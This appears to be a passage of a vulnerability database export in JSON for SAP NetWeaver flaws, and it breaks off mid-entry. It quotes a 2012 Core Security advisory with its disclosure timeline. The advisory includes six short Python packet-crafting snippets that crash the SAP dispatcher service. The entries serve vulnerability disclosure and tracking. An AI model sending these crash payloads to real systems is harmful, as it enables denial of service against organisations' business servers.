module process a specially crafted network packet. \nMalicious packets are processed by the vulnerable function\n\u0027DiagTraceR3Info\u0027 in the \u0027disp+work.exe\u0027 module when the Developer Trace\nis configured at levels 2 or 3 for the \"Dialog processor\" component of\nthe \"Dialog\" work process handling the packet [2]. The\nfollowing python code can be used to trigger the vulnerability:\n\n/-----\ncrash = \"X\"*114 + \"\\xff\\xff\" # --\u003e Unicode Address to call !\ncrash+= \"Y\"*32\ncrash = \"\\x10\\x06\\x20\" + struct.pack(\"!H\", len(crash)) + crash\nsend_message(connection, crash)\n-----/\n\n\n\n8.2. This vulnerability could allow a\nremote unauthenticated attacker to conduct a denial of service attack\nagainst the vulnerable systems. The following python code can be used to\ntrigger the vulnerability:\n\n/-----\ncrash = \"\\x12\\x04\\x18\\xff\\xff\\xff\\xffCrash!\"\nsend_message(connection, crash)\n-----/\n\n\n\n8.3. This vulnerability could allow a remote\nunauthenticated attacker to conduct a denial of service attack. The\nfollowing python code can be used to trigger the vulnerability:\n\n/-----\ncrash = \"\\x12\\x09\\x02\\x00\\x00\\x00\\x08\" + \"\\x80\"*8\nsend_message(connection, crash)\n-----/\n\n\n\n8.4. \n\n/-----\ncrash = \"\\x10\\x13\\x09\\x00\\xFF\\x12\\x1A\\x59\\x51\"\nsend_message(connection, crash)\n-----/\n\n\n\n8.5. \n\n/-----\ncrash = \"\\x10\\x0c\\x0e\\x00\\0a\" + \"A\"*10\nsend_message(connection, crash)\n-----/\n\n\n\n8.6. This\nvulnerability could allow a remote unauthenticated attacker to conduct a\ndenial of service attack. \n\n/-----\ncrash = \"\\x10\\x0f\\x01\\x00\\x11\" + \"A\"*17\nsend_message(connection, crash)\n-----/\n\n\n\n9. *Report Timeline*\n\n. 2012-01-24:\nCore Security Technologies notifies the SAP team of the vulnerability,\nsetting the estimated publication date of the advisory for February\n21st, 2012. 2012-01-24:\nCore sends an advisory draft with technical details. 2012-01-24:\nThe SAP team confirms the reception of the issue and asks to use the\nsecurity ID 582820-2012 for further communication. SAP also notifies its\nterms and conditions [3], and asks for Core to commit to that guideline. 2012-02-01:\nThe Core Advisories Team communicates that it has its own guidelines for\nthe advisories publication process, which may conflict with SAP\u0027s\nguidelines. In particular, Core does not guarantee that the publication\nof the advisory will be postponed until a fix or patch is made available\nby SAP. If information about this vulnerability is partially or\ncompletely leaked by a third party, the advisory would be released\nimmediately as forced release. Despite this, the Core team commits to\ncomply with SAP\u0027s guidelines as much as possible. 2012-02-21:\nFirst release date missed. 2012-02-22:\nCore asks for the status of the fix and notifies that the release date\nwas missed. 2012-02-23:\nSAP notifies that, because the development team has to downport the\nsolutions for a huge bunch of software releases, the earliest release\ndate for the patches would be May 8th 2012. 2012-02-23:\nCore re-schedules the advisory publication to May 8th. 2012-04-16:\nCore asks if the patching process is still on track to release patches\non May 8th and requests a status of the fix. 2012-04-16:\nVendor notifies that the release date is still planned for May 8th, but\ndue to quality control processes this date cannot be guaranteed. 2012-05-04:\nCore notifies that everything is ready for publication and requests the\nvendor to confirm the release date and the list of affected platforms\n(no reply received). 2012-05-07:\nCore asks again for the status of the fix. 2012-05-08:\nSAP notifies that they have released the security note 1687910 [4] on\nMay Patch Day 2012 and asks to include that information in [Sec. 6]. SAP\nalso requests Core to remove all the technical information researched by\nMartin Gallo in [Sec. 8]. 2012-05-08:\nCore replies that the reporting of vulnerabilities is aimed at helping\nvulnerable users to understand and address the issues; the advisory will\nthus be released with the technical information. 2012-05-08:\nAdvisory CORE-2012-0123 published. \n\n\n\n10. *References*\n\n[1] http://www.sap.com/platform/netweaver/index.epx\n[2]\nhttp://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/cc212b3fa5296fe10000000a42189b/frameset.htm\n[3] SAP\u0027s legal information, terms and conditions\nhttp://www.sdn.sap.com/irj/sdn/security?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section46. \n\n[4] SAP security note 1687910\nhttps://service.sap.com/sap/support/notes/1687910. \n\n\n11. *About CoreLabs*\n\nCoreLabs, the research center of Core Security Technologies, is charged\nwith anticipating the future needs and requirements for information\nsecurity technologies. We conduct our research in several important\nareas of computer security including system vulnerabilities, cyber\nattack planning and simulation, source code auditing, and cryptography. \nOur results include problem formalization, identification of\nvulnerabilities, novel solutions and prototypes for new technologies. \nCoreLabs regularly publishes security advisories, technical papers,\nproject information and shared software tools for public use at:\nhttp://corelabs.coresecurity.com. \n\n\n12. *About Core Security Technologies*\n\nCore Security Technologies enables organizations to get ahead of threats\nwith security test and measurement solutions that continuously identify\nand demonstrate real-world exposures to their most critical assets. Our\ncustomers can gain real visibility into their security standing, real\nvalidation of their security controls, and real metrics to more\neffectively secure their organizations. \n\nCore Security\u0027s software solutions build on over a decade of trusted\nresearch and leading-edge threat expertise from the company\u0027s Security\nConsulting Services, CoreLabs and Engineering groups. Core Security\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\nhttp://www.coresecurity.com. \n\n\n13. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2012 Core Security\nTechnologies and (c) 2012 CoreLabs, and are licensed under a Creative\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n\n14. *PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nTechnologies advisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc",
"sources": [
{
"db": "NVD",
"id": "CVE-2012-2513"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-002403"
},
{
"db": "BID",
"id": "53424"
},
{
"db": "VULMON",
"id": "CVE-2012-2513"
},
{
"db": "PACKETSTORM",
"id": "112569"
},
{
"db": "PACKETSTORM",
"id": "112538"
}
],
"trust": 2.16
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=20705",
"trust": 0.2,
"type": "exploit"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2012-2513"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2012-2513",
"trust": 2.9
},
{
"db": "SECTRACK",
"id": "1027052",
"trust": 1.1
},
{
"db": "BID",
"id": "53424",
"trust": 1.0
},
{
"db": "JVNDB",
"id": "JVNDB-2012-002403",
"trust": 0.8
},
{
"db": "SECUNIA",
"id": "48980",
"trust": 0.7
},
{
"db": "NSFOCUS",
"id": "19579",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201205-161",
"trust": 0.6
},
{
"db": "EXPLOIT-DB",
"id": "20705",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2012-2513",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "112569",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "112538",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2012-2513"
},
{
"db": "BID",
"id": "53424"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-002403"
},
{
"db": "PACKETSTORM",
"id": "112569"
},
{
"db": "PACKETSTORM",
"id": "112538"
},
{
"db": "NVD",
"id": "CVE-2012-2513"
},
{
"db": "CNNVD",
"id": "CNNVD-201205-161"
}
]
},
"id": "VAR-201205-0131",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.2949160133333333
},
"last_update_date": "2023-12-18T12:22:02.450000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Acknowledgments to Security Researchers",
"trust": 0.8,
"url": "http://scn.sap.com/docs/doc-8218"
},
{
"title": "martingalloar",
"trust": 0.1,
"url": "https://github.com/martingalloar/martingalloar "
},
{
"title": "publications",
"trust": 0.1,
"url": "https://github.com/martingalloar/publications "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2012-2513"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-002403"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-002403"
},
{
"db": "NVD",
"id": "CVE-2012-2513"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.2,
"url": "http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities"
},
{
"trust": 1.8,
"url": "https://service.sap.com/sap/support/notes/1687910"
},
{
"trust": 1.7,
"url": "http://scn.sap.com/docs/doc-8218"
},
{
"trust": 1.1,
"url": "http://www.securitytracker.com/id?1027052"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/75455"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-2513"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-2513"
},
{
"trust": 0.7,
"url": "http://www.securityfocus.com/bid/53424"
},
{
"trust": 0.6,
"url": "http://secunia.com/advisories/48980"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/19579"
},
{
"trust": 0.4,
"url": "http://www.sap.com/platform/netweaver/index.epx"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/119.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/martingalloar/martingalloar"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/20705/"
},
{
"trust": 0.1,
"url": "http://secunia.com/psi_30_beta_launch"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_intelligence/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=48980"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/48980/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/48980/#comments"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com/"
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/content/services-overview-core-security-consulting-services."
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-2511"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-1516"
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc."
},
{
"trust": 0.1,
"url": "http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/cc212b3fa5296fe10000000a42189b/frameset.htm"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-1517"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-2513"
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/content/corelabs-advisories"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-2514"
},
{
"trust": 0.1,
"url": "https://service.sap.com/sap/support/notes/1687910."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-2512"
},
{
"trust": 0.1,
"url": "http://www.sdn.sap.com/irj/sdn/security?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section46."
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2012-2513"
},
{
"db": "BID",
"id": "53424"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-002403"
},
{
"db": "PACKETSTORM",
"id": "112569"
},
{
"db": "PACKETSTORM",
"id": "112538"
},
{
"db": "NVD",
"id": "CVE-2012-2513"
},
{
"db": "CNNVD",
"id": "CNNVD-201205-161"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2012-2513"
},
{
"db": "BID",
"id": "53424"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-002403"
},
{
"db": "PACKETSTORM",
"id": "112569"
},
{
"db": "PACKETSTORM",
"id": "112538"
},
{
"db": "NVD",
"id": "CVE-2012-2513"
},
{
"db": "CNNVD",
"id": "CNNVD-201205-161"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-05-15T00:00:00",
"db": "VULMON",
"id": "CVE-2012-2513"
},
{
"date": "2012-05-08T00:00:00",
"db": "BID",
"id": "53424"
},
{
"date": "2012-05-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2012-002403"
},
{
"date": "2012-05-09T07:38:14",
"db": "PACKETSTORM",
"id": "112569"
},
{
"date": "2012-05-08T15:15:15",
"db": "PACKETSTORM",
"id": "112538"
},
{
"date": "2012-05-15T04:21:43.453000",
"db": "NVD",
"id": "CVE-2012-2513"
},
{
"date": "2012-05-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201205-161"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-08-29T00:00:00",
"db": "VULMON",
"id": "CVE-2012-2513"
},
{
"date": "2012-09-04T05:50:00",
"db": "BID",
"id": "53424"
},
{
"date": "2012-05-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2012-002403"
},
{
"date": "2017-08-29T01:31:37.447000",
"db": "NVD",
"id": "CVE-2012-2513"
},
{
"date": "2012-05-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201205-161"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "112538"
},
{
"db": "CNNVD",
"id": "CNNVD-201205-161"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver of Diaginput Service disruption in functions ( Daemon crash ) Vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-002403"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer overflow",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201205-161"
}
],
"trust": 0.6
}
}
var-201509-0560
Vulnerability from variot
SAP NetWeaver is prone to an cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. Remote attackers can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. SAP NetWeaver 7.40 is vulnerable; other versions may also be affected.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201509-0560",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.40"
}
],
"sources": [
{
"db": "BID",
"id": "79346"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Roman Bezhan (ERPScan)",
"sources": [
{
"db": "BID",
"id": "79346"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is prone to an cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.\nRemote attackers can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.\nSAP NetWeaver 7.40 is vulnerable; other versions may also be affected.",
"sources": [
{
"db": "BID",
"id": "79346"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "79346",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "79346"
}
]
},
"id": "VAR-201509-0560",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.26917922
},
"last_update_date": "2022-05-17T01:36:46.609000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "https://help.sap.com/nw_platform"
},
{
"trust": 0.3,
"url": "http://erpscan.com/advisories/erpscan-15-022-sap-netweaver-7-4-xss/"
}
],
"sources": [
{
"db": "BID",
"id": "79346"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "79346"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-09-09T00:00:00",
"db": "BID",
"id": "79346"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-09-09T00:00:00",
"db": "BID",
"id": "79346"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "79346"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Cross Site Scripting Vulnerability",
"sources": [
{
"db": "BID",
"id": "79346"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Input Validation Error",
"sources": [
{
"db": "BID",
"id": "79346"
}
],
"trust": 0.3
}
}
var-201606-0578
Vulnerability from variot
SAP BI Reporting and Planning is prone to an information-disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may lead to further attacks.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201606-0578",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "91200"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "91200"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP BI Reporting and Planning is prone to an information-disclosure vulnerability.\nAttackers can exploit this issue to obtain sensitive information that may lead to further attacks.",
"sources": [
{
"db": "BID",
"id": "91200"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "91200",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "91200"
}
]
},
"id": "VAR-201606-0578",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.26917922
},
"last_update_date": "2022-05-17T01:47:55.892000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "http://www.sap.com"
}
],
"sources": [
{
"db": "BID",
"id": "91200"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "91200"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-06-14T00:00:00",
"db": "BID",
"id": "91200"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-06-14T00:00:00",
"db": "BID",
"id": "91200"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "91200"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP BI Reporting and Planning Information Disclosure Vulnerability",
"sources": [
{
"db": "BID",
"id": "91200"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Input Validation Error",
"sources": [
{
"db": "BID",
"id": "91200"
}
],
"trust": 0.3
}
}
var-201109-0445
Vulnerability from variot
SAP NetWeaver is prone to an information-disclosure vulnerability. Successful exploits will allow attackers to obtain sensitive information that may aid in further attacks.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201109-0445",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "49655"
}
]
},
"credits": {
"@context": {
